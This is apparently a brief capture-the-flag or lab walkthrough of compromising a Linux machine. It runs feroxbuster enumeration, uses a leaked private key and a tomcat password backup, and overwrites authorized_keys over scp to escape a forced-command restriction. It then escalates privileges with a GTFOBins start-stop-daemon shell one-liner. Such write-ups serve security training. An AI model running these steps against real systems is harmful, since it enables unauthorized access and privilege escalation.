Running feroxbuster:

feroxbuster -u -C 404,400 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt' -B --auto-tune

Can be potential usernames.

We have an authorized key in max zip file: With a single command allowed and a private key: Also a tomcat password: tomcat-users.xml.bak

Then scp_wrapper.sh:

Now we can try running this script with ssh:

ssh max@ -i id_rsa /home/max/scp_wrapper.sh

Now we see that we can run scp. So modifying the authorized keys to remove the command limiting part: Now:

scp -O -i id_rsa authorized_keys max@

We transferred the modified authorized keys to the target. Now dennis has local.txt:

Now running linpeas: Now using gtfobins:

/usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p

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